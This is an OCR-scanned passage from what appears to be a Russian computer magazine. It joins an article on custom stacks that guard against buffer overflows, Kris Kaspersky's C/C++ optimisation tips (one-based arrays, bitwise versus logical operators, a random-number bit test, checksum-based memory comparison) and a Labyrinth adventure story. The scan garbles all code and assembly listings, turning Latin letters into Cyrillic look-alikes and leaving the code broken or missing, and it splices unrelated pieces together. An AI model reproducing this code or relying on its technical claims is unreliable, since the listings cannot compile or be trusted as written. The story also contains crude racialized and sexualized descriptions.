МОѴ ЕБІ , ЕВР ; грузим в ЕБІ ука- 

затель на конец области локальных 
переменных 

ЗБВ ЕБІ, 1оса1_ѵаг_зІ2е 
; вычисляем указатель на локальный 
буфер (в данном случае он расположен 
по смещению О ОД 



; относительно фрейма) 

ВЕР МОѴЗВ 

; копируем агд_Ь байт из агд_с в ло- 
кальный буфер 

; // делаем еще что-то полезное 

КЕТ ; выходим из функции 

Рукотворный стеке локальными перемен- 
ными и аргументами растет сверху вниз, то 
есть в направлении, противоположном росту 
обычного стека, и это неспроста. Во-первых, 
подсистема памяти ІВМ РС и операционная 
система ѴѴіп б оѵѵз оптимизированы именно 
под такое выделение памяти, и мы получаем 
выигрыш в производительности. Во-вто- 
рых, внизу рукотворного стека находится 
неинициализированная область памяти, что 
делает ошибки переполнения неактуальны- 
ми. Затираются лишь локальные переменные 
текущей функции, да и то лишь те, которые 
лежат ниже переполняющегося буфера. 
Адреса возврата хранятся в другом месте, 
и на них эти переполнения не распростра- 
няются, если, конечно, натуральный стек 
расположен выше рукотворного. 

Основную трудность представляет засылка 
аргументов в рукотворный стек. Под МЗ- 
003 мы могли выделить отдельный сегмент 
и использовать РІІЗН с префиксом «03:», 
а под ѴѴіпбоѵѵз приходится применять МОѴ 
[ЕВР+ХХН], УУУУ. При этом адресации типа 
«память — память» в х86-процессорах 
не было и нет. В практическом плане это 
означает, что нам придется использовать 
промежуточные регистры: МОѴ ЕАХ, 
[ѴѴУУУМОѴ [ЕВР+ХХН], ЕАХ. Впрочем, это 
можно оптимизировать, если использовать 
команду ЗТОЗО, занимающую в «машинном 
представлении» всего один байт и копирую- 
щую содержимое ЕАХ в ячейку, на которую 
указывает ЕОІ, одновременно с увеличени- 
ем последнего на размер двойного слова. 
Стаскивать аргументы с рукотворного стека 
можно командой ІХЮЗО. 



Окончательно расхулиганившись, можно 
создать целых 3 стека: один — стандар- 
тный, для хранения адресов возврата; 
другой — для аргументов; третий — для 
локальных переменных. Чтобы не расходо- 
вать регистры понапрасну, можно хранить 
указатели на вершины двух рукотворных 
стеков в оперативной памяти, загружая 
их то в регистр ЕВР, то в ЕЗІ/ЕОІ, в зави- 
симости от того, какой из них окажется 
удобнее в тот или иной момент. Падения 
производительности можно не опасаться. 
Большую часть своего времени указатели 
будут проводить в кэш-памяти, извлекаясь 
всего за 1-2 такта. 

Естественно, все сказанное выше, относит- 
ся только к нашим собственным функциям, 
а АРІ-функции операционной системы 
таких извращений не понимают и ожидают 
аргументов в стандартном стеке. Ну, что тут 
можно сказать. . . Персонально для АРІ-фун- 
кций аргументы можно передать и в стан- 
дартном стеке, предварительно убедив- 
шись, что при этих аргументах функция 
гарантированно не вызовет переполнения 
(что вовсе не факт, особенно при работе 
с функциями из библиотеки птзНітІ.бІІ). 

К тому же в 64-битной редакции ѴѴіпбоѵѵз 
аргументы АРІ-функциями в большинстве 
случаев передаются не через стек, а через 
регистры, поэтому описанная методика 
к ним вполне применима. 

А вот как защитить от переполнения фун- 
кции обычных библиотек? Самое простое 
решение — вызвать функции не по САН, 
а по ЛѴІР, разместив адрес возврата на вер- 
шине страницы памяти, доступной только 
на чтение. Ниже ее будут только аргументы, 
также доступные только на чтение, а вот 
локальные переменные, создаваемые 
функцией, будут доступны и на чтение, 
и на запись. Естественно, этот трюк будет 
работать только с теми функциями, которые 
не изменяют своих аргументов (а многие из 
них изменяют их только так), но по-другому 
просто не получается! ИИ 
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ТРЮКИ 

ОТ КРЫСА 



ПРОГРАММИСТСКИЕ ТРЮКИ И ФИЧИ НА С\С++ ОТ КРИСА КАСПЕРСКИ 



01 



Массив, начинающийся с единицы 

В Си массивы начинаются с нуля, а во многих 
других языках — с единицы, что сильно напря- 
гает при переходе с одного языка на другой 
и еще больше — при переносе программ. 
Приходится вносить множество правок в 
самых разных местах и потом долго отлажи- 
вать программу. Да и сами сишники далеко 
не в восторге оттого, что индекс последнего 
элемента массива размером N равен N-1 . 

Это не только служит источником досадных 
ошибок, но в некоторых случаях снижает 
производительность. 

Существует хитрый хак, позволяющий созда- 
вать массивы, начинающиеся с единицы, или, 
строго говоря, вообще с любого числа. Это 
невероятно полезно в тех случаях, когда нам 
нужно создать массив, проиндексированный 
так: к, к+1 ,,,к+п (например, возрастом челове- 
ка от 16 лет до 100). Смотри: 



// задаем размер массива, его тип и 



// индекс первого элемента 



#сіе1іпе ЗІ2Е ОЕ АККАУ 0x1000 



// размера 



р= (ТУРЕ _ ОР _ АККАУ*)та11ос(ЗІ2Е _ 



ОЕ _ АККАУ*зІ 2 еоТ(ТУРЕ _ ОЕ _ АККАУ)); 



// проверка на успешность выделения 



// памяти 



іі: (!р) /* обработка ситуации ошибки 



выделения */ 



// сдвигаем указатель на нужное 



// количество позиций, так, чтобы индекс 



// первого элемента стал равен 



// ШРЕХ _ ОЕ _ ЕІКЗТ _ ЕЪЕМЕЫТ 



р -= ШЦЕХ _ ОЕ _ ЕІКЗТ _ ЕЪЕМЕЫТ; 



// работаем с массивом 



// возвращаем указатель на место 



р += ШБЕХ _ ОЕ _ ЕІКЗТ _ ЕЪЕМЕЫТ; 



// освобождаем блок памяти 



Угее (р) ; 



Аналогичным путем можно обрабатывать 
и локальные массивы (в этом случае наша 
задача даже упрощается, поскольку не нужно 
заботиться об освобождении памяти): 



// задаем размер массива, его тип и 



индекс первого элемента 



#бе1іпе ЗІ2Е _ ОЕ _ АККАУ 0x1000 



#бе1іпе ТУРЕ ОЕ АККАУ іпб 



#беЯпе ІЫРЕХ ОЕ ЕІКЗТ ЕЬЕМЕЫТ 1^И#с1е1іпе ШРЕХ ОЕ ЕІКЗТ ЕЬЕМЕЫТ 1 



// сдвигаем указатель на нужное 



// кол-во позиций, так, чтобы индекс 



// первого элемента стал равен 



// ШРЕХ _ ОЕ _ ЕІКЗТ _ ЕЪЕМЕЫТ 



5 -= ШБЕХ ОЕ ЕІКЗТ ЕЪЕМЕЫТ; 



02 



П объявляем переменную-указатель 



// выделяем блок памяти требуемого 



// выделяем блок памяти требуемого 



// размера 



ТУ РЕ_ОЕ_АККАУ г ам [ 3 I 2Е_ОЕ_АККАУ ] 



Марафон битовых и логических 
операций 

В некоторых руководствах и конференци- 
ях можно прочесть, что выражение вида 
«(а II Ь II с)» практически всегда быстрее, чем 
«(а I Ь I с)». Такли это? И если так, то почему? 
Попробуем разобраться. Поскольку все 
современные компиляторы поддерживают 
«быстрые булевы операции», они вычисля- 
ют значение сложного выражения лишь до 
первой лжи. То есть если а == 0, то оставшу- 
юся часть выражения можно не проверять, 
поскольку уже и так все ясно. 

Напротив, битовое выражение «(а I Ь I с)» 
требует вычисления всех переменных, что 
на первый взгляд выглядит более похабным 
и менее производительным. Но это только на 
первый взгляд. Все зависит оттого, насколь- 
ко часто «быстрая булева оптимизация» 
прерывает вычисление выражения до его 
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завершения. Если все переменные преиму- 
щество равны нулю, то ни о каком выигрыше 
говорить не приходится, а вот код получается 
при этом намного более громоздким, что лег- 
ко подтверждается дизассемблером: 




Что мы видим?! Условные переходы. То есть 
ветвления. А процессоры с конвейерной 
архитектурой (типа Репііит Рго+) условных 
переходов не любят, особенно если они вы- 
полняются в цикле. Как следствие — вместо 
обещанного выигрыша мы получаем падение 
производительности. 



РЕЗУЛЬТАТ ДИЗАССЕМБЛИРОВАНИЯ ГОО(ШГ 
А, ШГ В,ШТ С) (ІЕ (А | В | С) НЕ ТИКИ А; ) 




А вот в выражении «(а I Ь I с)» никаких 
условных переходов нет, и оно выполняет- 
ся предельно быстро! Поэтому используй 
«(а II ... II х)» только при большом количест- 
ве элементов (намного больше трех) и толь- 
ко, если одна или несколько переменных 
гораздо чаще равны ТЯЕІЕ, чем РАІ_ЗЕ (при 
этом они должны стоять первыми слева). 

То же самое относится и к «&&», лишь с той 
оговоркой, что переменные, преимущес- 
твенно равные РІ_АЗЕ, следует выдвигать 
вперед. 




Оценка качества генератора 
случайных чисел 

Г енератор случайных чисел используется не 
только в криптоалгоритмах, но и в более «при- 
земленных» программах. РІапример, в играх. 

И очень часто нам важно знать, насколько 
случаен выдаваемый им результат (допустим, 
мы моделируем казино в поисках беспроиг- 
рышной стратегии). 

Причем кроме общей вероятности, пред- 
ставляет интерес выяснить степень распре- 



деления вероятности по каждому из битов. 
РІекоторые генераторы страдают хроничес- 
кой предсказуемостью определенных бит 
(как правило, младших или старших). 
Следующая программа как раз и позволяет 
оценить, насколько предсказуем тот или 
иной бит: 



#беііпе N 10000 Д щ " ' 
ипзідпесі іпі Ъиі [зігеоі (іпі) * 8 ] 



ппаіп() 



В 



ипзідпесі іпі а, 1 ; И/ЗЙ г : 

згапсЦ (ипзідпесі) ііше (ШЛШ) ) ; Н|у| 
іог (1 = 0 ; 1 < зігеоі (іпЬ) * 8 ; 1 ++) 




іог (а = 0 , х = 0 ; а < Ы; а++) {Д 
Ьиі [ 1 ] += ( (гапсЦ)» 1 ) & 1 ); 




іог (а = 0 ; а < зігеоі: (іпЬ) * 8 ; а++) 

ргіпВ5(<<%02сі:%02сі.%о"ТіТТ7Д^ 

аД000 0ПшЕ[а]/Ы/10 0 

100 00^Ьиі[а]/Ы%100); Д 

Щ: і п Ь і! Щ \ грс ) ; НЬ* Ш ' ' ' 



В 



Результат прогона на М3 ѴС 6 показывает, 
что биты от 0 до 1 4 генерируются довольно- 
таки качественно (с вероятностью 50/50 и 
погрешностью порядка 1 %), а вот, начиная 
с 15 бита, мы имеем сплошной облом!!! То 
есть, по сути, гапб() возвращает 14 битный 
результат, не дотягивающий даже до 
ѴѴОРО! 
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А вот дсс 3.3.4 (другие версии не тестирова- 
лись) дает совсем другой результат, задейс- 
твовав 31 бит и на десятые доли процента 
обогнав М3 ѴС по качеству. В некоторых 
приложениях эта разница оказывается более 
чем критична! Так что дсс рулит! 
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Самое быстрое сравнение памяти 

Большинство реализаций функции тетстрО 
так или иначе сводятся к оптимизированному 
ассемблерному алгоритму: 



ѵЩіІе ( — соипі && *(с 1 іаг *)ЪиТ 1 == 
*(сДаг *) 



В 



ЪиТІ = (сДаг *) ЪиТІ + 1 ; 
ЬиТ 2 = (сііаг *) ЬиТ 2 + 1 ; 



В 

А как насчет того, чтобы ускорить его раза 
эдак в два, причем без использования ЗЗЕ, 
ргеЧеісИ'а и прочих подобных расширений? 
Поверь мне, это возможно! Достаточно 
разбить блоки памяти на кусочки от 1 28 байт 
до ~4 Кбайт каждый (в зависимости от 
размера самих блоков) и сравнивать не 
сами блоки, а контрольные суммы «кусоч- 
ков» . Если функции расчета контрольных 
сумм разместить в отдельных потоках, то на 
многоядерных и НТ-процессорах они будет 
выполняться параллельно, в результате чего 
производительность практически удвоится. 
Но даже на однопроцессорных машинах мы 
получим определенный выигрыш, поскольку 
контроллеры памяти оптимизированы под 
работу с одним потоком памяти, поперемен- 
ное обращение к двум ячейкам, находящимся 
в различных О РАМ -банках в некоторых 
случаях вызывает значительную деградацию 
производительности (подробнее об этом 
можно прочитать в моей книге «Техника 
оптимизации программ», электронная версия 
которой доступна на ИДр://крпс.орепппе1.ги и 
Кр://пегиті.огд.ги ). 

Единственная проблема заключается в том, 
что идентичность СРС еще не гарантиру- 
ет идентичности блоков! То есть данный 
алгоритм никогда не выдает «ложных нега- 
тивных» результатов, но с определенной 
(правда, очень невысокой) степенью вероят- 
ностью способен на «ложный позитив». По- 
этому его следует применять для сравнения 
тех блоков, о которых заранее известно, 
что они скорее всего различны, и мы просто 
хотим убедиться в этом, поскольку если 
СРС-алгоритм не обнаружил сравнений, для 
1 00% уверенности необходимо иниции- 
ровать стандартный алгоритм сравнения. 
Впрочем, при дроблении сравниваемых 
блоков на кусочки порядка 1 28 байт вероят- 
ность коллизий СЯС32 (и тем более СВС64) 
насколько мала, что ей можно полностью 
пренебречь (если, конечно, речь идет о 
непредумышленной «подделке» блоков 
хакерами). ЕЕ 
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□ Часть 1 . Г ород 

Он попал в тоннель. Впереди стремительно 
приближалось окно света. Потом он полно- 
стью окунулся в ослепляющую белизну. Вок- 
руг не было ничего, только белый свет. . . Все 
это продолжалось несколько секунд, как и 
говорил Храмовник. Ровно столько занимал 
переход в Лабиринт. Затем свет отступил, 
и глаза Лайса начали различать очертания 
того места, в котором он оказался. 

Это была зеркальная комната пять на пять 
метров, абсолютно пустая, без каких-либо 
признаков выхода. Лайс поднялся с пола, 
подошел к одной из стенок, в которой было 
отчетливо видно его отражение. Из зеркала 
на него смотрел зрелый мужчина, слегка 
небритый, в сером свободном костюме 
спортивного типа. На ногах были удобные 
туфли в тон штанам. Он слышал, что эту 
надежную и практичную одежду специально 
разработали для всех скитальцев Лабирин- 
та, чтобы хоть как-то облегчить им предстоя- 
щие испытания. Но это мало кому помогло. . . 
Лайс прикоснулся к зеркальной стенке и 
тут же отпрянул назад — отражение стало 
стремительно меняться. Оно скукожилось 
и за какие-то несколько секунд покрылось 
морщинами. Волосы покрылись сединой, 
ногти выросли в двое, кожа побледнела и 
иссохла. Оно смотрело прямо в глаза Лайсу, 
и в этом взгляде читался ужас. Перед ним 



теперь находился не он сам, а дряхлый 
старик, едва стоящий на ногах. Невольно 
Лайс опустил глаза к своим ладоням — в 
нем ничего не изменилось. Это всего лишь 
иллюзия, одна из проделок Лабиринта, 
но все-таки ему стало жутковато. Старик 
в зеркале упал на пол и, издав последний 
выдох, стал превращаться в мумию. Такие, 
вероятно, находят в гробницах египетских 
пирамид — черные, засохшие, с пустотой в 
мертвых глазницах. 

Интересно, чем его еще удивит зеркаль- 
ная комната до тех пор, пока он не умрет 
от отсутствия воздуха? Но Лайс решил не 
дожидаться этого. Он внимательно ощупал 
все стороны коробки и едва почувствовал 
холодок между стыками зеркал в одной из 
них. Отойдя в сторону, Лайс повернулся к 
этой стороне боком и с разбегу бросился на 
зеркало. Раздался дребезг, осколки встре- 
тили его стеклянным дождем, и он кубарем 
скатился по наклонному коридору на улицу. 
Это был город, очень похожий на негритян- 
ский квартал в старом Нью-Йорке. Такие же 
узкие проходы, грязные стены домов, изуро- 
дованные неприличными надписями, мусор 
кругом. Только одно отличало это место от 
Г арлема — абсолютная, гробовая тишина. 

В этом городе не было машин, пешеходов, 
даже птиц. Ни одной живой души. 

— Эй ! — крикнул в воздух Лайс, но ответом 



ему было только шуршание пролетевшей 
рядом старой газеты. 

Лайс наугад выбрал сторону и двинулся 
вперед. На правой обочине находился забро- 

© 

шенныи, проржавевший насквозь детский 
автобус. Без стекол и шин, он прекрасно впи- 
сывался в общую картину города-призрака. 

Рядом валялась потрескавшаяся от времени 
вывеска « ѴѴеІсоте іо БаЬугіпііі » . 

Несмотря натишину, Лайс знал: опасности 
подстерегают повсюду. Внутри салона авто- 
буса могла оказаться теплочувствительная 
взрывчатка; внезапно поднявшийся ураган 
мог сорвать с места вывеску и раскроить ей 
череп Лайса; в конце концов, в этом городе 
могли водиться мутанты, только и ждущие, 
чтобы расправиться с очередной жертвой. 
Скитальцы, попавшие в Лабиринт, должны 
были быть постоянно начеку. 

За очередным углом улицы Лайс увидел 
витрину оружейного магазина. Осторожно за- 
глянув за стекло, он убедился, что там никого 
нет, и зашел внутрь. Как и весь город, магазин 
был давно заброшен, стойка была покрыта 
сантиметровым слоем пыли, а оружейные 
шкафы пустовали. Лайс обшарил все углы 
и, только когда уже отчаялся найти какое-ни- 
будь оружие, заметил спрятанную под кассой 
биту. Это была гладко полированная дубинка 
с этикеткой на рукояти «Від ВиІІз». В юности 
Лайс занимался бейсболом и даже завое- 
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вал среди ровесников авторитет лучшего 
«подающего», но теперь бита должна была 
послужить другим целям. 

Едва Пайс успел взять биту в руки, как услы- 
шал сзади тихий, угрожающий рык. В пяти 
метрах от него, сразу у выхода из магазина 
стоял огромный черный пес с грязной ском- 
канной шерстью. Вместо левого глаза у него 
зияла черная дыра, правым он с ненавистью 
смотрел на Пайса. 

Человек и собака не двигались, каждый из 
них выжидал, кто сделает первый шаг. В этот 
момент одна из коробок, находившихся на 
верхней полке в торговом зале, с грохотом 
свалилась вниз. Этого сигнала было доста- 
точно — ринувшись в атаку, пес прыгнул, 
метя зубами в горло. Пайс ощутил зловонный 
запах разложившейся плоти, исходивший 
из пасти животного, и успел увидеть, как 
сверкнули его острые клыки. Но достичь 
своей цели тварь не успела. Сделав резкий 
замах, как в старые добрые времена, Пайс со 
всего духу засадил псу по черепушке. Издав 
жалкий визг, животное отлетело на несколько 
метров и притихло. Только нога продолжала 
подергиваться в конвульсиях. Пайс осторож- 
но подошел и увидел, как из головы пса течет 
черная жидкость. 

«Надо же, не потерял форму», — подумал он 
и отправился к выходу. 

Пайс медленно шел по центральной улице, 
держа биту наготове. Г де-то в этом городе 
могли быть другие скитальцы, но шансы най- 
ти их были невысоки. Территория Лабиринта 
простиралась далеко за пределы искусст- 
венного Г арлема, и даже сами создатели 
не знали всех его тайн. За двадцать пять лет 
здесь побывали тысячи людей, которые по- 
жертвовали всем ради попытки осуществить 
главную цель. Многие сходили с дистанции в 
первые же минуты и часы, остальные просто 
застревали, не имея никакой возможности 
вернуться и не представляя, что делать даль- 
ше. Каждый, кто сюда приходил, считал, что 
сможет одолеть Систему и пройти все ловуш- 
ки. Но до сих пор дойти до конца не удалось 
никому. Пайс был одним из добровольцев; от 
остальных он отличался тем, что на его сторо- 
не был Храмовник — один из Богов Лабирин- 
та. Поэтому у него был шанс добиться того, 
чего не удавалось еще никому. 

Краем уха Л айс услышал гул, едва различи- 
мый, но несущий в себе угрозу. Он оглянулся 
назад и увидел вдали желтый туман, надви- 
гающийся на город. С его приближением 



гул нарастал. Л айс решил ускорить шаг и 
постепенно перешел на бег. Г ул неприятно 
отзывался в ушных раковинах, как будто Лайс 
находился вблизи включенной на макси- 
мальную громкость колонки. Северная часть 
города погрузилась в желтую массу. 

Лайс уже понял, что это, и несся во весь опор 
по пустынной улице, пытаясь спастись. Г ул 
стал невыносимым, голова буквально раска- 
лывалась на части, и Лайс подумал, что может 
не выдержать еще до того, как смертонос- 
ный рой настигнет его. Желтое цунами уже 
было не дальше, чем в трехстах метрах. Еще 
каких-то несколько минут и . . . 

В этот момент Лайс увидел открытый люк 
— свое спасение. Чувствуя, что сердце вот- 
вот выпрыгнет из груди, ловя воздух ртом, он 
поднажал еще немного, и за несколько секунд 
до того, как рой его настиг, прыгнул вниз. 
Думать о том, насколько глубок подземный 
колодец и что находится внизу, времени уже 
не оставалось. 

Несколько мгновений свободного падения, 
затем глухой удар. И мрак. 



Когда Лайс очнулся, гул вверху уже стих, 
но ему на смену пришла другая напасть 
— отвратительная вонь канализации. Он 
оглянулся и увидел вверху лестницу, ведущую 
на поверхность. Но добраться до нее не было 
никакой возможности — как минимум шесть 
метров от земли. Г лаза уже немного привыкли 
к темноте, и Лайс рассмотрел проем в стене 
колодца, ведущий в глубь шахты. Сразу 
за поворотом в стене он нащупал факел, у 
основания которого кто-то заботливо оставил 
коробок спичек. Вспыхнувший свет озарил 
все кругом, полчища мерзких огромных крыс, 
напуганных незваным гостем, тут же с писком 
бросились в стороны. 

Держа перед собой факел, Лайс по колено в 
нечистотах стал пробираться по канализаци- 
онному тоннелю вперед. Крысы расступались 
живым ковром, и он подумал, что если бы 
падение было менее удачным, эти твари могли 
бы сожрать его уже к утру. 

Нос через какое-то время привык к специ- 
фичным запахам вокруг и воспринимал их 
не так болезненно. Романтики в начале его 
путешествия оказалось меньше, чем он 
ожидал. Лабиринт вообще был непредска- 
зуемым местом. Жуткие клоаки и болота 
здесь граничили с необычайно красивыми 
рощами; заброшенные города и поселки вели 
к причудливым колониям, в которых хотелось 
остаться навсегда. Вероятно, поэтому всегда 



находились люди, которые отправлялись 
в Лабиринт по собственному желанию, 
несмотря на подстерегающие со всех сторон 
опасности. Этот мир привлекал их сильнее, 
чем тот, что был снаружи. 

Размышления Лайса прервал странный звук, 
раздающийся впереди. Барабаны! Ритмичный 
мотив, отбиваемый неизвестными музыканта- 
ми, немного оживил тишину канализационных 
тоннелей. Лайс шел на этот звук, пока не 
достиг развилки. Главный коридор, развет- 
вляясь, продолжал идти вперед. По бокам 
тонкого прохода, образовавшегося слева, 
располагались покрытые плесенью трубы. 
Проход справа был значительно привле- 
кательнее — на удивление сухие стены, а 
впереди — тусклый свет. Определить, с какой 
стороны раздавались барабаны, Лайс не мог, 
но чувствовал, что если он выберет один из 
путей, то к этой развилке уже не вернется. 
Лайс внимательно осмотрел начала всех трех 
коридоров и заметил у правого скрывающую- 
ся в тени маленькую серебристую стрелочку, 
указывающую путь. Он улыбнулся и твердым 
шагом последовал в правый проход. 

Сырое подземелье канализации преврати- 
лось в старый подземный грот, заваленный 
камнями. С потолка свисали сталактиты, а в 
свете его факела то и дело взмывали вверх 
потревоженные летающие мыши. Барабан- 
ная музыка раздавалась уже совсем рядом, 
когда Лайс наконец увидел впереди большой 
проем, ведущий в просторный зал. 

Едва он успел войти туда, как прямо за ним 
обрушился огромный камень, полностью 
отрезая путь назад. Одновременно с этим 
барабанный хор умолк и все вокруг погрузи- 
лось в тишину. 

Помещение, в котором он оказался, напоми- 
нало храм. Высокие потолки, мягкое свечение 
со всех сторон, а посредине на металличес- 
ком постаменте, исписанном иероглифами, 
возвышался светящийся голубым светом 
кристалл. Лайс не знал, является ли он клю- 
нем к выходу или очередной ловушкой Лаби- 
ринта, но ему больше ничего не оставалось, 
как это проверить. В любом случае, храм был 
полностью изолирован, а единственный про- 
ход, через который он в него попал, завален. 
Лайс подошел к постаменту, каждый его шаг 
гулким эхом отражался от стен. Вниматель- 
ный осмотр иероглифов и самого кристалла 
ничего не дал. Никаких зацепок. 

Он протянул руки и осторожно снял тяжелый 
драгоценный камень со своего места. 
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В ту жѳ секунду весь зал содрогнулся, 
откуда-то с потолка посыпались пыль и ще- 
бенка, а из недр подземелья послышалось 
журчание воды. За несколько секунд вода 
проникла в храм и теперь лилась отовсюду, 
пробивая камень и затапливая помещение. 
Ее напор все увеличивался, а уровень воды 
быстро поднимался. Пайс стоял по пояс в 
ледяной воде, обшаривая стены и пытаясь 
найти какой-нибудь рычаг, способный 
вызволить его из ловушки. Но все было 
бесполезно. 

Когда уровень воды достиг горла Пайса, 
ему пришлось переплыть на другую сторону 
зала. По его примерным подсчетам, помеще- 
ние должно было полностью затопить через 
десять минут, так что времени найти способ 
выбраться у него оставалось немного. 

«Я буду вести тебя, но не смогу выручать 
везде и всюду» , — вспомнил Пайс слова 
Храмовника. — «Используй все свои знания, 



умения и жизненный опыт, только так можно 
выжить в Лабиринте». Легко сказать. В такой 
ситуации вряд ли мог пригодиться жизнен- 
ный опыт, скорее — удача. 

Вода уже наполовину заполнила помещение. 
Лайс смог выбраться на один из выступов, на- 
ходившихся прямо под потолком, и осмотрел 
купол храма. Потолок над ним был сплошным, 
а под сводами находились небольшие вкрап- 
ленные в камень стеклышки, от которых по 
всему залу распространялся мягкий желто- 
ватый свет. Внутри этих стеклянных фонарей 
было какое-то движение. Очевидно, именно 
существа внутри, сходные по строению со 
светлячками, освещали весь храм. Сейчас 
этот свет отражался от водной поверхности 
и создавал на стенах причудливые радуж- 
ные переливы. Несмотря нато что времени 
оставалось крайне мало, Лайс не мог не 
уделить несколько секунд этому необычному 
зрелищу. 



Вода достигла его временного пристани- 
ща и уже была совсем близко к потолку. 
Барахтаться в воде, удерживая одной рукой 
кристалл, было неудобно. Лайсу хотелось 
выбросить балласт, но он был уверен, что эта 
вещица является кпючем к выходу. 

Когда вода была уже в трех метрах от потол- 
ка, Лайс нашел то, что искал. Углубление в 
стене, скрывающееся в одном из углов по- 
толка, было незаметно издалека. Размерами 
и формой оно повторяло контуры кристалла, 
и Лайс, не теряя времени, вставил камень в 
углубление. 

Вода посреди зала тут же запузырилась, и 
на этом месте образовалась воронка. Лайс 
почувствовал, как поток воды подхватил его 
и понес прямиков в водоворот. Некоторое 
время он пытался сопротивляться, схватив- 
шись за выступ, но водная стихия оказалась 
сильнее, и он повиновался, ожидая своей 
дальнейшей участи. 
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«ТРИ МИНУТЫ ЛАЙС ЗАВОРОЖЕНО НА- 
БЛЮДАЛ ЗА ПРОЦЕССОВ ВОЗРОЖДЕНИЯ 
МОНСТРА. И КОГДА КОСТЯНОЙ ДРАКОН 
ПРЕДСТАЛ ПЕРЕД НИМ ВО ВСЕЙ КРАСЕ, 
ЛАЙС ВДРУГ ПОНЯЛ, ЧТО ОДНОГО КЛИНКА 
ТУТ БУДЕТ НЕДОСТАТОЧНО» 



Пайс едва успел сделать большой вдох перед 
тем, как погрузиться под воду. Его тянуло к 
самому дну, кидая из стороны в стороны. Он 
уже вот-вот был готов захлебнуться, когда 
поток воды выкинул его в отполированный 
каменный желоб, по которому Пайс вместе 
с волной стремительно понесся в неизвест- 
ность. 

Полет продолжался секунд сорок и закон- 
чился очередным падением в мутную лужу. 
Пайс перевел дух и осмотрелся. 

Вокруг находилось кладбище: горы черепов, 
скелетов и просто тлеющих останков, 
разбросанных повсюду. Сам склеп был по 
размерам даже больше, чем Храм; повсюду 
свисали паутины и затхлые тряпки; на полу 
были разбросаны ржавые мечи, клинки, 
щиты и доспехи. Сверху медленно, подобно 
снегу, летел белый пепел. От этого места у 
Пайса мурашки пошли по коже. Но самым 
жутким элементом этой потусторонней моза- 
ики был застывший посреди груды черепов 
огромный костяной силуэт какого-то давно 
погибшего животного. Он чем-то напоминал 
разобранный экспонат музея палеонтологии, 
но размером превышал могучих тираннозав- 
ров раза в три. 

Пайс нашел более-менее сохранив- 
шийся меч, который удерживал в 
окаменевших руках один из погибших 
воинов. Ему уже однажды приходилось 
держать меч в руках, но тогда ему было 
1 1 лет, клинок был деревянным, а про- 
тивниками были такие же мальчишки, 
как и он сам. Клинок оказался доволь- 
но тяжелым, хотя удобно лежал в руке. 
Сделав для пробы пару выпадов, Пайс 
решил, что с этой штукой сможет пос- 
тоять за себя, и подошел к застывшей 
костяной статуе. 



Что-то изменилось. Пайс насторожился и 
отошел назад, но было уже поздно. Кости 
дракона зашевелились, а глазные впадины 
огромного черепа зажглись дьявольским ог- 
нем. Те фрагменты скелета, которые лежали в 
отдельных частях зала, стали медленно притя- 
гиваться к десятиметровому позвоночнику и, 
словно ведомые невидимой рукой, занимали 
положенное им место. Полуразвалившаяся 
костяная статуя обретала свой первоначаль- 
ный вид и оживала на глазах. Три минуты 
Пайс заворожено наблюдал за процессов 
возрождения монстра. И когда костяной 
дракон предстал перед ним во всей красе, 
Пайс вдруг понял, что одного клинка тут будет 
недостаточно. 

Монстр уже заметил потревожившую его 
человека и, направив на него свою костлявую 
морду, издал протяжный истошный рев. Зву- 
ковая волна откинула Пайса к стене, а воздух 
вокруг заполнился запахом смерти и тлена. 

— Храмовник, если ты меня слышишь, выру- 
чай! — тихо сказал Пайс. 

Костяной дракон навис над ним, готовясь 
одним ударом размазать наглого человеч- 
ка. И в этот момент откуда-то сверху упал 
конец веревки, а женский голос крикнул: 
«Хватай». Второй раз приглашать его 
не пришлось. Сделав прыжок и ухватив- 
шись за конец каната, Пайс почувствовал 
рывок. Какой-то силач быстро тащил его 
наверх. 

Дракон, не ожидавший такого поворота собы- 
тий, издал еще один рык и занес над Лайсом 
лапу, за что получил сверху порцию горящих 
стрел, угодивших ему прямо в глаз. Пайс уже 
был вне досягаемости страшного хранителя 
этого места, а дракон неистовствовал, круша 
стены и раскидывая груды костей. 

Наконец, Лайс поднялся на выступ, с которого 
ему скинули веревку, и хотел поблагодарить 
своих спасителей. 



— Не благодари, — словно читая его мысли, 
сказала рыжая девица лет двадцати пяти, 
похожая на амазонку. Она была практически 
полностью обнажена: в кожаных повязках, 
боевой раскраске и с луком в руке. Рядом с 
ней стоял гигантский лысый негр, одетый в 
изрядно потрепанную стандартную форму 
скитальца Лабиринта. А еще с ними был 
маленький старичок, опиравшийся на грубую 
палку. 

— Я Мирва. Это Джуд, — показала амазонка 
на негра, — а это дядя Бо. 

Лайс в ответ коротко представился. 

— Идем, незнакомец, здесь не самое безо- 
пасное место. 



Шли молча, то и дело сворачивая в новые 
тоннели. Его попутчики хорошо знали дорогу 
и ни разу не остановились, чтобы проверить, 
правильно ли идут. По пути Лайс с любо- 
пытством разглядывал своих спасителей, 
особенно задницу сексапильной амазоночки, 
и размышлял о том, что делать дальше. 

Г ород был не самым далеким районом от его 
цели, но и не самым близким. Лайсу предсто- 
ял долгий переход через несколько других 
секторов, половина которых имела макси- 
мальный уровень опасности. По крайней 
мере, так считал Храмовник. Все, что у него 
было, — это примерный ориентир и помощь 
одного из Богов, целиком полагаться на кото- 
рую он не мог. 

Лайс поравнялся с Мирвой и нарушил мол- 
чание: 

— Куда мы идем? 

— На поверхность. Тебе повезло, что мы 
оказались рядом. В такую глушь мало кто 
забирается. 

— А зачем сюда пришли вы? 

— Светоиды. 

— Светоиды? 
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— Маленький фосфоресцирующие жучки. 

Их можно найти в некоторых местах глубоко 
под землей. С электричеством тут, знаешь ли, 
напряженка, а ими очень удобно пользовать- 
ся каклампами. 

Т ол ько тут Пайс заметил у Джуда за плечами 
рюкзак, из которого доносилось свечение. 

— Аты как здесь оказался? Похоже, новичок 
в Лабиринте? 

— Мой первый день. 

— И сразу знакомство с Кракалусом, — Мир- 
ва залилась веселым смехом. — Повезло же 
тебе. 

— Кто такой Кракалус? 

— Так мы зовем костяного стража сокро- 
вищницы, который чуть не отправил тебя на 
тот свет. Правда сокровищ там уже осталось 
немного. 

— А ты здесь давно? 

— Два года. 

Это было много. Намного больше, чем мог вы- 
держать обычный человек. За один тот день 
Лайс едва не лишился жизни уже раз пять. 
Сколько же тогда раз на волоске от смерти 
находилась эта юная особа? 

— Знаешь, тут не так плохо, как привыкли 
считать! — поделилась Мирва. — Нужно толь- 



ко знать все входы-выходы и не совать нос 
куда попало. А еще всегда носить с собой это. 
Мирва похлопала по кобуре на поясе, из 
которой выглядывала резная рукоять внуши- 
тельного ножа. 

